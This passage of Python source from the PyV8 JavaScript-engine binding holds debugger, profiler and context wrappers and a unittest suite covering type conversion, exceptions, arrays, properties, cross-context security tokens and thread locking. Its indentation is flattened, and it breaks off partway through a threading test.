def onDebugEvent(self, type, state, evt):
if type == JSDebugEvent.Break:
if self.onBreak: self.onBreak(JSDebugEvent.BreakEvent(evt))
elif type == JSDebugEvent.Exception:
if self.onException: self.onException(JSDebugEvent.ExceptionEvent(evt))
elif type == JSDebugEvent.NewFunction:
if self.onNewFunction: self.onNewFunction(JSDebugEvent.NewFunctionEvent(evt))
elif type == JSDebugEvent.BeforeCompile:
if self.onBeforeCompile: self.onBeforeCompile(JSDebugEvent.BeforeCompileEvent(evt))
elif type == JSDebugEvent.AfterCompile:
if self.onAfterCompile: self.onAfterCompile(JSDebugEvent.AfterCompileEvent(evt))
def onDispatchDebugMessages(self):
return True
def debugBreak(self):
_PyV8.debug().debugBreak()
def debugBreakForCommand(self):
_PyV8.debug().debugBreakForCommand()
def cancelDebugBreak(self):
_PyV8.debug().cancelDebugBreak()
def processDebugMessages(self):
_PyV8.debug().processDebugMessages()
def sendCommand(self, cmd, *args, **kwds):
request = json.dumps({
'seq': self.nextSeq(),
'type': 'request',
'command': cmd,
'arguments': kwds
})
_PyV8.debug().sendCommand(request)
return request
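    # Illustrative note (not part of the original source): a call such as
    # stepNext() below ultimately sends a JSON request of roughly this shape
    # (key order may vary):
    #   {"seq": 0, "type": "request", "command": "continue",
    #    "arguments": {"stepaction": "next"}}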
def debugContinue(self, action='next', steps=1):
return self.sendCommand('continue', stepaction=action)
def stepNext(self, steps=1):
"""Step to the next statement in the current function."""
return self.debugContinue(action='next', steps=steps)
def stepIn(self, steps=1):
"""Step into new functions invoked or the next statement in the current function."""
return self.debugContinue(action='in', steps=steps)
def stepOut(self, steps=1):
"""Step out of the current function."""
return self.debugContinue(action='out', steps=steps)
def stepMin(self, steps=1):
"""Perform a minimum step in the current function."""
        return self.debugContinue(action='min', steps=steps)
class JSProfiler(_PyV8.JSProfiler):
@property
def logs(self):
pos = 0
while True:
size, buf = self.getLogLines(pos)
if size == 0:
break
for line in buf.split('\n'):
yield line
pos += size
profiler = JSProfiler()
JSObjectSpace = _PyV8.JSObjectSpace
JSAllocationAction = _PyV8.JSAllocationAction
class JSEngine(_PyV8.JSEngine):
def __init__(self):
_PyV8.JSEngine.__init__(self)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
del self
JSScript = _PyV8.JSScript
JSStackTrace = _PyV8.JSStackTrace
JSStackTrace.Options = _PyV8.JSStackTraceOptions
JSStackFrame = _PyV8.JSStackFrame
class JSIsolate(_PyV8.JSIsolate):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
del self
class JSContext(_PyV8.JSContext):
def __init__(self, obj=None, extensions=None, ctxt=None):
if JSLocker.active:
self.lock = JSLocker()
self.lock.enter()
if ctxt:
_PyV8.JSContext.__init__(self, ctxt)
else:
_PyV8.JSContext.__init__(self, obj, extensions or [])
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
        if hasattr(self, 'lock') and self.lock:
self.lock.leave()
self.lock = None
del self
# contribute by marc boeker <http://code.google.com/u/marc.boeker/>
def convert(obj):
if type(obj) == _PyV8.JSArray:
return [convert(v) for v in obj]
if type(obj) == _PyV8.JSObject:
return dict([[str(k), convert(obj.__getattr__(str(k)))] for k in (obj.__dir__() if is_py3k else obj.__members__)])
return obj
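# Illustrative note (not part of the original source): convert() recursively
# turns wrapped V8 values into plain Python containers, e.g. a JSObject built
# from eval("({a: 1, b: [1, 2]})") becomes {'a': 1, 'b': [1, 2]}.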
class AST:
Scope = _PyV8.AstScope
VarMode = _PyV8.AstVariableMode
Var = _PyV8.AstVariable
Label = _PyV8.AstLabel
NodeType = _PyV8.AstNodeType
Node = _PyV8.AstNode
Statement = _PyV8.AstStatement
Expression = _PyV8.AstExpression
Breakable = _PyV8.AstBreakableStatement
Block = _PyV8.AstBlock
Declaration = _PyV8.AstDeclaration
VariableDeclaration = _PyV8.AstVariableDeclaration
Module = _PyV8.AstModule
ModuleDeclaration = _PyV8.AstModuleDeclaration
ModuleLiteral = _PyV8.AstModuleLiteral
ModuleVariable = _PyV8.AstModuleVariable
ModulePath = _PyV8.AstModulePath
Iteration = _PyV8.AstIterationStatement
DoWhile = _PyV8.AstDoWhileStatement
While = _PyV8.AstWhileStatement
For = _PyV8.AstForStatement
ForIn = _PyV8.AstForInStatement
ExpressionStatement = _PyV8.AstExpressionStatement
Continue = _PyV8.AstContinueStatement
Break = _PyV8.AstBreakStatement
Return = _PyV8.AstReturnStatement
With = _PyV8.AstWithStatement
Case = _PyV8.AstCaseClause
Switch = _PyV8.AstSwitchStatement
Try = _PyV8.AstTryStatement
TryCatch = _PyV8.AstTryCatchStatement
TryFinally = _PyV8.AstTryFinallyStatement
Debugger = _PyV8.AstDebuggerStatement
Empty = _PyV8.AstEmptyStatement
Literal = _PyV8.AstLiteral
MaterializedLiteral = _PyV8.AstMaterializedLiteral
PropertyKind = _PyV8.AstPropertyKind
ObjectProperty = _PyV8.AstObjectProperty
Object = _PyV8.AstObjectLiteral
RegExp = _PyV8.AstRegExpLiteral
Array = _PyV8.AstArrayLiteral
VarProxy = _PyV8.AstVariableProxy
Property = _PyV8.AstProperty
Call = _PyV8.AstCall
CallNew = _PyV8.AstCallNew
CallRuntime = _PyV8.AstCallRuntime
Op = _PyV8.AstOperation
UnaryOp = _PyV8.AstUnaryOperation
BinOp = _PyV8.AstBinaryOperation
CountOp = _PyV8.AstCountOperation
CompOp = _PyV8.AstCompareOperation
Conditional = _PyV8.AstConditional
Assignment = _PyV8.AstAssignment
Throw = _PyV8.AstThrow
Function = _PyV8.AstFunctionLiteral
SharedFunction = _PyV8.AstSharedFunctionInfoLiteral
This = _PyV8.AstThisFunction
from datetime import *
import unittest
import traceback
if is_py3k:
def toNativeString(s):
return s
def toUnicodeString(s):
return s
else:
    def toNativeString(s, encoding='utf-8'):
        return s.encode(encoding) if isinstance(s, unicode) else s
    def toUnicodeString(s, encoding='utf-8'):
        return s if isinstance(s, unicode) else unicode(s, encoding)
class TestContext(unittest.TestCase):
def testMultiNamespace(self):
self.assertTrue(not bool(JSContext.inContext))
self.assertTrue(not bool(JSContext.entered))
class Global(object):
name = "global"
g = Global()
with JSContext(g) as ctxt:
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
class Local(object):
name = "local"
l = Local()
with JSContext(l):
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(l.name, str(JSContext.entered.locals.name))
self.assertEqual(l.name, str(JSContext.current.locals.name))
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
self.assertTrue(not bool(JSContext.entered))
self.assertTrue(not bool(JSContext.inContext))
def _testMultiContext(self):
# Create an environment
with JSContext() as ctxt0:
ctxt0.securityToken = "password"
global0 = ctxt0.locals
global0.custom = 1234
self.assertEqual(1234, int(global0.custom))
# Create an independent environment
with JSContext() as ctxt1:
ctxt1.securityToken = ctxt0.securityToken
global1 = ctxt1.locals
global1.custom = 1234
with ctxt0:
self.assertEqual(1234, int(global0.custom))
self.assertEqual(1234, int(global1.custom))
# Now create a new context with the old global
with JSContext(global1) as ctxt2:
ctxt2.securityToken = ctxt1.securityToken
with ctxt1:
self.assertEqual(1234, int(global1.custom))
def _testSecurityChecks(self):
with JSContext() as env1:
env1.securityToken = "foo"
# Create a function in env1.
env1.eval("spy=function(){return spy;}")
spy = env1.locals.spy
self.assertTrue(isinstance(spy, _PyV8.JSFunction))
# Create another function accessing global objects.
env1.eval("spy2=function(){return 123;}")
spy2 = env1.locals.spy2
self.assertTrue(isinstance(spy2, _PyV8.JSFunction))
# Switch to env2 in the same domain and invoke spy on env2.
env2 = JSContext()
env2.securityToken = "foo"
with env2:
result = spy.apply(env2.locals)
self.assertTrue(isinstance(result, _PyV8.JSFunction))
env2.securityToken = "bar"
# Call cross_domain_call, it should throw an exception
with env2:
self.assertRaises(JSError, spy2.apply, env2.locals)
def _testCrossDomainDelete(self):
with JSContext() as env1:
env2 = JSContext()
# Set to the same domain.
env1.securityToken = "foo"
env2.securityToken = "foo"
env1.locals.prop = 3
env2.locals.env1 = env1.locals
# Change env2 to a different domain and delete env1.prop.
#env2.securityToken = "bar"
self.assertEqual(3, int(env1.eval("prop")))
with env2:
self.assertEqual(3, int(env2.eval("this.env1.prop")))
self.assertEqual("false", str(env2.eval("delete env1.prop")))
# Check that env1.prop still exists.
self.assertEqual(3, int(env1.locals.prop))
class TestWrapper(unittest.TestCase):
def testObject(self):
with JSContext() as ctxt:
o = ctxt.eval("new Object()")
self.assertTrue(hash(o) > 0)
o1 = o.clone()
self.assertEqual(hash(o1), hash(o))
self.assertTrue(o != o1)
self.assertRaises(UnboundLocalError, o.clone)
def testAutoConverter(self):
with JSContext() as ctxt:
ctxt.eval("""
var_i = 1;
var_f = 1.0;
var_s = "test";
var_b = true;
var_s_obj = new String("test");
var_b_obj = new Boolean(true);
var_f_obj = new Number(1.5);
""")
vars = ctxt.locals
var_i = vars.var_i
self.assertTrue(var_i)
self.assertEqual(1, int(var_i))
var_f = vars.var_f
self.assertTrue(var_f)
self.assertEqual(1.0, float(vars.var_f))
var_s = vars.var_s
self.assertTrue(var_s)
self.assertEqual("test", str(vars.var_s))
var_b = vars.var_b
self.assertTrue(var_b)
self.assertTrue(bool(var_b))
self.assertEqual("test", vars.var_s_obj)
self.assertTrue(vars.var_b_obj)
self.assertEqual(1.5, vars.var_f_obj)
attrs = dir(ctxt.locals)
self.assertTrue(attrs)
self.assertTrue("var_i" in attrs)
self.assertTrue("var_f" in attrs)
self.assertTrue("var_s" in attrs)
self.assertTrue("var_b" in attrs)
self.assertTrue("var_s_obj" in attrs)
self.assertTrue("var_b_obj" in attrs)
self.assertTrue("var_f_obj" in attrs)
def testExactConverter(self):
class MyInteger(int, JSClass):
pass
class MyString(str, JSClass):
pass
class MyUnicode(str, JSClass):
pass
class MyDateTime(time, JSClass):
pass
class Global(JSClass):
var_bool = True
var_int = 1
var_float = 1.0
var_str = 'str'
var_unicode = 'unicode'
var_datetime = datetime.now()
var_date = date.today()
var_time = time()
var_myint = MyInteger()
var_mystr = MyString('mystr')
var_myunicode = MyUnicode('myunicode')
var_mytime = MyDateTime()
with JSContext(Global()) as ctxt:
typename = ctxt.eval("(function (name) { return this[name].constructor.name; })")
typeof = ctxt.eval("(function (name) { return typeof(this[name]); })")
self.assertEqual('Boolean', typename('var_bool'))
self.assertEqual('Number', typename('var_int'))
self.assertEqual('Number', typename('var_float'))
self.assertEqual('String', typename('var_str'))
self.assertEqual('String', typename('var_unicode'))
self.assertEqual('Date', typename('var_datetime'))
self.assertEqual('Date', typename('var_date'))
self.assertEqual('Date', typename('var_time'))
self.assertEqual('MyInteger', typename('var_myint'))
self.assertEqual('MyString', typename('var_mystr'))
self.assertEqual('MyUnicode', typename('var_myunicode'))
self.assertEqual('MyDateTime', typename('var_mytime'))
self.assertEqual('object', typeof('var_myint'))
self.assertEqual('object', typeof('var_mystr'))
self.assertEqual('object', typeof('var_myunicode'))
self.assertEqual('object', typeof('var_mytime'))
def testJavascriptWrapper(self):
with JSContext() as ctxt:
self.assertEqual(type(None), type(ctxt.eval("null")))
self.assertEqual(type(None), type(ctxt.eval("undefined")))
self.assertEqual(bool, type(ctxt.eval("true")))
self.assertEqual(str, type(ctxt.eval("'test'")))
self.assertEqual(int, type(ctxt.eval("123")))
self.assertEqual(float, type(ctxt.eval("3.14")))
self.assertEqual(datetime, type(ctxt.eval("new Date()")))
self.assertEqual(JSArray, type(ctxt.eval("[1, 2, 3]")))
self.assertEqual(JSFunction, type(ctxt.eval("(function() {})")))
self.assertEqual(JSObject, type(ctxt.eval("new Object()")))
def testPythonWrapper(self):
with JSContext() as ctxt:
typeof = ctxt.eval("(function type(value) { return typeof value; })")
protoof = ctxt.eval("(function protoof(value) { return Object.prototype.toString.apply(value); })")
self.assertEqual('[object Null]', protoof(None))
self.assertEqual('boolean', typeof(True))
self.assertEqual('number', typeof(123))
self.assertEqual('number', typeof(3.14))
self.assertEqual('string', typeof('test'))
self.assertEqual('string', typeof('test'))
self.assertEqual('[object Date]', protoof(datetime.now()))
self.assertEqual('[object Date]', protoof(date.today()))
self.assertEqual('[object Date]', protoof(time()))
def test():
pass
self.assertEqual('[object Function]', protoof(abs))
self.assertEqual('[object Function]', protoof(test))
self.assertEqual('[object Function]', protoof(self.testPythonWrapper))
self.assertEqual('[object Function]', protoof(int))
def testFunction(self):
with JSContext() as ctxt:
func = ctxt.eval("""
(function ()
{
function a()
{
return "abc";
}
return a();
})
""")
self.assertEqual("abc", str(func()))
self.assertTrue(func != None)
self.assertFalse(func == None)
func = ctxt.eval("(function test() {})")
self.assertEqual("test", func.name)
self.assertEqual("", func.resname)
self.assertEqual(0, func.linenum)
self.assertEqual(14, func.colnum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
#TODO fix me, why the setter doesn't work?
# func.name = "hello"
# it seems __setattr__ was called instead of CJavascriptFunction::SetName
func.setName("hello")
self.assertEqual("hello", func.name)
def testCall(self):
class Hello(object):
def __call__(self, name):
return "hello " + name
class Global(JSClass):
hello = Hello()
with JSContext(Global()) as ctxt:
self.assertEqual("hello flier", ctxt.eval("hello('flier')"))
def testJSFunction(self):
with JSContext() as ctxt:
hello = ctxt.eval("(function (name) { return 'hello ' + name; })")
self.assertTrue(isinstance(hello, _PyV8.JSFunction))
self.assertEqual("hello flier", hello('flier'))
self.assertEqual("hello flier", hello.invoke(['flier']))
obj = ctxt.eval("({ 'name': 'flier', 'hello': function (name) { return 'hello ' + name + ' from ' + this.name; }})")
hello = obj.hello
self.assertTrue(isinstance(hello, JSFunction))
self.assertEqual("hello flier from flier", hello('flier'))
tester = ctxt.eval("({ 'name': 'tester' })")
self.assertEqual("hello flier from tester", hello.invoke(tester, ['flier']))
self.assertEqual("hello flier from json", hello.apply({ 'name': 'json' }, ['flier']))
def testConstructor(self):
with JSContext() as ctx:
ctx.eval("""
var Test = function() {
this.trySomething();
};
Test.prototype.trySomething = function() {
this.name = 'flier';
};
var Test2 = function(first_name, last_name) {
this.name = first_name + ' ' + last_name;
};
""")
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSFunction))
test = JSObject.create(ctx.locals.Test)
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSObject))
self.assertEqual("flier", test.name);
test2 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'))
self.assertEqual("Flier Lu", test2.name);
test3 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'), { 'email': 'flier.lu@gmail.com' })
self.assertEqual("flier.lu@gmail.com", test3.email);
def testJSError(self):
with JSContext() as ctxt:
try:
ctxt.eval('throw "test"')
self.fail()
except:
self.assertTrue(JSError, sys.exc_info()[0])
def testErrorInfo(self):
with JSContext() as ctxt:
with JSEngine() as engine:
try:
engine.compile("""
function hello()
{
throw Error("hello world");
}
hello();""", "test", 10, 10).run()
self.fail()
except JSError as e:
self.assertTrue(str(e).startswith('JSError: Error: hello world ( test @ 14 : 34 ) ->'))
self.assertEqual("Error", e.name)
self.assertEqual("hello world", e.message)
self.assertEqual("test", e.scriptName)
self.assertEqual(14, e.lineNum)
self.assertEqual(102, e.startPos)
self.assertEqual(103, e.endPos)
self.assertEqual(34, e.startCol)
self.assertEqual(35, e.endCol)
self.assertEqual('throw Error("hello world");', e.sourceLine.strip())
self.assertEqual('Error: hello world\n' +
' at Error (<anonymous>)\n' +
' at hello (test:14:35)\n' +
' at test:17:25', e.stackTrace)
def testParseStack(self):
self.assertEqual([
('Error', 'unknown source', None, None),
('test', 'native', None, None),
('<anonymous>', 'test0', 3, 5),
('f', 'test1', 2, 19),
('g', 'test2', 1, 15),
(None, 'test3', 1, None),
(None, 'test3', 1, 1),
], JSError.parse_stack("""Error: err
at Error (unknown source)
at test (native)
at new <anonymous> (test0:3:5)
at f (test1:2:19)
at g (test2:1:15)
at test3:1
at test3:1:1"""))
def testStackTrace(self):
class Global(JSClass):
def GetCurrentStackTrace(self, limit):
return JSStackTrace.GetCurrentStackTrace(4, JSStackTrace.Options.Detailed)
with JSContext(Global()) as ctxt:
st = ctxt.eval("""
function a()
{
return GetCurrentStackTrace(10);
}
function b()
{
return eval("a()");
}
function c()
{
return new b();
}
c();""", "test")
self.assertEqual(4, len(st))
self.assertEqual("\tat a (test:4:28)\n\tat (eval)\n\tat b (test:8:28)\n\tat c (test:12:28)\n", str(st))
self.assertEqual("test.a (4:28)\n. (1:1) eval\ntest.b (8:28) constructor\ntest.c (12:28)",
"\n".join(["%s.%s (%d:%d)%s%s" % (
f.scriptName, f.funcName, f.lineNum, f.column,
' eval' if f.isEval else '',
' constructor' if f.isConstructor else '') for f in st]))
def testPythonException(self):
class Global(JSClass):
def raiseException(self):
raise RuntimeError("Hello")
with JSContext(Global()) as ctxt:
r = ctxt.eval("""
msg ="";
try
{
this.raiseException()
}
catch(e)
{
msg += "catch " + e + ";";
}
finally
{
msg += "finally";
}""")
self.assertEqual("catch Error: Hello;finally", str(ctxt.locals.msg))
def testExceptionMapping(self):
class TestException(Exception):
pass
class Global(JSClass):
def raiseIndexError(self):
return [1, 2, 3][5]
def raiseAttributeError(self):
None.hello()
def raiseSyntaxError(self):
eval("???")
def raiseTypeError(self):
int(sys)
def raiseNotImplementedError(self):
raise NotImplementedError("Not support")
def raiseExceptions(self):
raise TestException()
with JSContext(Global()) as ctxt:
ctxt.eval("try { this.raiseIndexError(); } catch (e) { msg = e; }")
self.assertEqual("RangeError: list index out of range", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseAttributeError(); } catch (e) { msg = e; }")
self.assertEqual("ReferenceError: 'NoneType' object has no attribute 'hello'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseSyntaxError(); } catch (e) { msg = e; }")
self.assertEqual("SyntaxError: invalid syntax", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseTypeError(); } catch (e) { msg = e; }")
self.assertEqual("TypeError: int() argument must be a string or a number, not 'module'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseNotImplementedError(); } catch (e) { msg = e; }")
self.assertEqual("Error: Not support", str(ctxt.locals.msg))
self.assertRaises(TestException, ctxt.eval, "this.raiseExceptions();")
def testArray(self):
with JSContext() as ctxt:
array = ctxt.eval("""
var array = new Array();
for (i=0; i<10; i++)
{
array[i] = 10-i;
}
array;
""")
self.assertTrue(isinstance(array, _PyV8.JSArray))
self.assertEqual(10, len(array))
self.assertTrue(5 in array)
self.assertFalse(15 in array)
self.assertEqual(10, len(array))
for i in range(10):
self.assertEqual(10-i, array[i])
array[5] = 0
self.assertEqual(0, array[5])
del array[5]
self.assertEqual(None, array[5])
# array [10, 9, 8, 7, 6, None, 4, 3, 2, 1]
# array[4:7] 4^^^^^^^^^7
# array[-3:-1] -3^^^^^^-1
# array[0:0] []
self.assertEqual([6, None, 4], array[4:7])
self.assertEqual([3, 2], array[-3:-1])
self.assertEqual([], array[0:0])
array[1:3] = [9, 9, 9]
self.assertEqual([10, 9, 9, 9, 7, 6, None, 4, 3, 2, 1], list(array))
array[5:8] = [8, 8]
self.assertEqual([10, 9, 9, 9, 7, 8, 8, 3, 2, 1], list(array))
del array[1:4]
self.assertEqual([10, 7, 8, 8, 3, 2, 1], list(array))
ctxt.locals.array1 = JSArray(5)
ctxt.locals.array2 = JSArray([1, 2, 3, 4, 5])
for i in range(len(ctxt.locals.array2)):
ctxt.locals.array1[i] = ctxt.locals.array2[i] * 10
ctxt.eval("""
var sum = 0;
for (i=0; i<array1.length; i++)
sum += array1[i]
for (i=0; i<array2.length; i++)
sum += array2[i]
""")
self.assertEqual(165, ctxt.locals.sum)
ctxt.locals.array3 = [1, 2, 3, 4, 5]
self.assertTrue(ctxt.eval('array3[1] === 2'))
self.assertTrue(ctxt.eval('array3[9] === undefined'))
args = [
["a = Array(7); for(i=0; i<a.length; i++) a[i] = i; a[3] = undefined; a[a.length-1]; a", "0,1,2,,4,5,6", [0, 1, 2, None, 4, 5, 6]],
["a = Array(7); for(i=0; i<a.length - 1; i++) a[i] = i; a[a.length-1]; a", "0,1,2,3,4,5,", [0, 1, 2, 3, 4, 5, None]],
["a = Array(7); for(i=1; i<a.length; i++) a[i] = i; a[a.length-1]; a", ",1,2,3,4,5,6", [None, 1, 2, 3, 4, 5, 6]]
]
for arg in args:
array = ctxt.eval(arg[0])
self.assertEqual(arg[1], str(array))
self.assertEqual(arg[2], [array[i] for i in range(len(array))])
self.assertEqual(3, ctxt.eval("(function (arr) { return arr.length; })")(JSArray([1, 2, 3])))
self.assertEqual(2, ctxt.eval("(function (arr, idx) { return arr[idx]; })")(JSArray([1, 2, 3]), 1))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray([1, 2, 3])))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray((1, 2, 3))))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray(list(range(3)))))
[x for x in JSArray([1,2,3])]
def testMultiDimArray(self):
with JSContext() as ctxt:
ret = ctxt.eval("""
({
'test': function(){
return [
[ 1, 'abla' ],
[ 2, 'ajkss' ],
]
}
})
""").test()
self.assertEqual([[1, 'abla'], [2, 'ajkss']], convert(ret))
def testLazyConstructor(self):
class Globals(JSClass):
def __init__(self):
self.array=JSArray([1,2,3])
with JSContext(Globals()) as ctxt:
self.assertEqual(2, ctxt.eval("""array[1]"""))
def testForEach(self):
class NamedClass(object):
foo = 1
def __init__(self):
self.bar = 2
@property
def foobar(self):
return self.foo + self.bar
def gen(x):
for i in range(x):
yield i
with JSContext() as ctxt:
func = ctxt.eval("""(function (k) {
var result = [];
for (var prop in k) {
result.push(prop);
}
return result;
})""")
self.assertTrue(set(["bar", "foo", "foobar"]).issubset(set(func(NamedClass()))))
self.assertEqual(["0", "1", "2"], list(func([1, 2, 3])))
self.assertEqual(["0", "1", "2"], list(func((1, 2, 3))))
self.assertEqual(["1", "2", "3"], list(func({1:1, 2:2, 3:3})))
self.assertEqual(["0", "1", "2"], list(func(gen(3))))
def testDict(self):
with JSContext() as ctxt:
obj = ctxt.eval("var r = { 'a' : 1, 'b' : 2 }; r")
self.assertEqual(1, obj.a)
self.assertEqual(2, obj.b)
self.assertEqual({ 'a' : 1, 'b' : 2 }, dict(obj))
self.assertEqual({ 'a': 1,
'b': [1, 2, 3],
'c': { 'str' : 'goofy',
'float' : 1.234,
'obj' : { 'name': 'john doe' }},
'd': True,
'e': None },
convert(ctxt.eval("""var x =
{ a: 1,
b: [1, 2, 3],
c: { str: 'goofy',
float: 1.234,
obj: { name: 'john doe' }},
d: true,
e: null }; x""")))
def testDate(self):
with JSContext() as ctxt:
now1 = ctxt.eval("new Date();")
self.assertTrue(now1)
now2 = datetime.utcnow()
delta = now2 - now1 if now2 > now1 else now1 - now2
self.assertTrue(delta < timedelta(seconds=1))
func = ctxt.eval("(function (d) { return d.toString(); })")
now = datetime.now()
self.assertTrue(str(func(now)).startswith(now.strftime("%a %b %d %Y %H:%M:%S")))
def testUnicode(self):
with JSContext() as ctxt:
self.assertEqual("人", toUnicodeString(ctxt.eval("\"人\"")))
self.assertEqual("é", toUnicodeString(ctxt.eval("\"é\"")))
func = ctxt.eval("(function (msg) { return msg.length; })")
self.assertEqual(2, func("测试"))
def testClassicStyleObject(self):
class FileSystemWarpper:
@property
def cwd(self):
return os.getcwd()
class Global:
@property
def fs(self):
return FileSystemWarpper()
with JSContext(Global()) as ctxt:
self.assertEqual(os.getcwd(), ctxt.eval("fs.cwd"))
def testRefCount(self):
count = sys.getrefcount(None)
class Global(JSClass):
pass
with JSContext(Global()) as ctxt:
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
def testProperty(self):
class Global(JSClass):
def __init__(self, name):
self._name = name
def getname(self):
return self._name
def setname(self, name):
self._name = name
def delname(self):
self._name = 'deleted'
name = property(getname, setname, delname)
g = Global('world')
with JSContext(g) as ctxt:
self.assertEqual('world', ctxt.eval("name"))
self.assertEqual('flier', ctxt.eval("this.name = 'flier';"))
self.assertEqual('flier', ctxt.eval("name"))
self.assertTrue(ctxt.eval("delete name"))
###
# FIXME replace the global object with Python object
#
#self.assertEqual('deleted', ctxt.eval("name"))
#ctxt.eval("__defineGetter__('name', function() { return 'fixed'; });")
#self.assertEqual('fixed', ctxt.eval("name"))
def testGetterAndSetter(self):
class Global(JSClass):
def __init__(self, testval):
self.testval = testval
with JSContext(Global("Test Value A")) as ctxt:
self.assertEqual("Test Value A", ctxt.locals.testval)
ctxt.eval("""
this.__defineGetter__("test", function() {
return this.testval;
});
this.__defineSetter__("test", function(val) {
this.testval = val;
});
""")
self.assertEqual("Test Value A", ctxt.locals.test)
ctxt.eval("test = 'Test Value B';")
self.assertEqual("Test Value B", ctxt.locals.test)
def testDestructor(self):
import gc
owner = self
owner.deleted = False
class Hello(object):
def say(self):
pass
def __del__(self):
owner.deleted = True
def test():
with JSContext() as ctxt:
fn = ctxt.eval("(function (obj) { obj.say(); })")
obj = Hello()
self.assertEqual(2, sys.getrefcount(obj))
fn(obj)
self.assertEqual(4, sys.getrefcount(obj))
del obj
test()
self.assertFalse(owner.deleted)
JSEngine.collect()
gc.collect()
self.assertTrue(owner.deleted)
def testNullInString(self):
with JSContext() as ctxt:
fn = ctxt.eval("(function (s) { return s; })")
self.assertEqual("hello \0 world", fn("hello \0 world"))
def testLivingObjectCache(self):
class Global(JSClass):
i = 1
b = True
o = object()
with JSContext(Global()) as ctxt:
self.assertTrue(ctxt.eval("i == i"))
self.assertTrue(ctxt.eval("b == b"))
self.assertTrue(ctxt.eval("o == o"))
def testNamedSetter(self):
class Obj(JSClass):
@property
def p(self):
return self._p
@p.setter
def p(self, value):
self._p = value
class Global(JSClass):
def __init__(self):
self.obj = Obj()
self.d = {}
self.p = None
with JSContext(Global()) as ctxt:
ctxt.eval("""
x = obj;
x.y = 10;
x.p = 10;
d.y = 10;
""")
self.assertEqual(10, ctxt.eval("obj.y"))
self.assertEqual(10, ctxt.eval("obj.p"))
self.assertEqual(10, ctxt.locals.d['y'])
def testWatch(self):
class Obj(JSClass):
def __init__(self):
self.p = 1
class Global(JSClass):
def __init__(self):
self.o = Obj()
with JSContext(Global()) as ctxt:
ctxt.eval("""
o.watch("p", function (id, oldval, newval) {
return oldval + newval;
});
""")
self.assertEqual(1, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(3, ctxt.eval("o.p"))
ctxt.eval("delete o.p;")
self.assertEqual(None, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(2, ctxt.eval("o.p"))
ctxt.eval("o.unwatch('p');")
ctxt.eval("o.p = 1;")
self.assertEqual(1, ctxt.eval("o.p"))
def testReferenceError(self):
class Global(JSClass):
def __init__(self):
self.s = self
with JSContext(Global()) as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, 'x')
self.assertTrue(ctxt.eval("typeof(x) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(String) === 'function'"))
self.assertTrue(ctxt.eval("typeof(s.String) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(s.z) === 'undefined'"))
def testRaiseExceptionInGetter(self):
class Document(JSClass):
def __getattr__(self, name):
if name == 'y':
raise TypeError()
return JSClass.__getattr__(self, name)
class Global(JSClass):
def __init__(self):
self.document = Document()
with JSContext(Global()) as ctxt:
self.assertEqual(None, ctxt.eval('document.x'))
self.assertRaises(TypeError, ctxt.eval, 'document.y')
class TestMultithread(unittest.TestCase):
def testLocker(self):
self.assertFalse(JSLocker.active)
self.assertFalse(JSLocker.locked)
with JSLocker() as outter_locker:
self.assertTrue(JSLocker.active)
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
with JSLocker() as inner_locker:
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
with JSUnlocker() as unlocker:
self.assertFalse(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
self.assertTrue(JSLocker.locked)
self.assertTrue(JSLocker.active)
self.assertFalse(JSLocker.locked)
locker = JSLocker()
with JSContext():
self.assertRaises(RuntimeError, locker.__enter__)
self.assertRaises(RuntimeError, locker.__exit__, None, None, None)
del locker
def testMultiPythonThread(self):
import time, threading
class Global:
count = 0
started = threading.Event()
finished = threading.Semaphore(0)
def sleep(self, ms):
time.sleep(ms / 1000.0)
self.count += 1
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
started.wait();
for (i=0; i<10; i++)
{
sleep(100);
}
finished.release();
""")
threading.Thread(target=run).start()
now = time.time()
self.assertEqual(0, g.count)
g.started.set()
g.finished.acquire()
self.assertEqual(10, g.count)
self.assertTrue((time.time() - now) >= 1)
def testMultiJavascriptThread(self):
import time, threading
class Global:
result = []
def add(self, value):
with JSUnlocker():
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker():
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
def _testPreemptionJavascriptThreads(self):
import time, threading
class Global:
result = []
def add(self, value):
# we use preemption scheduler to switch between threads
# so, just comment the JSUnlocker
#
# with JSUnlocker() as unlocker:
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
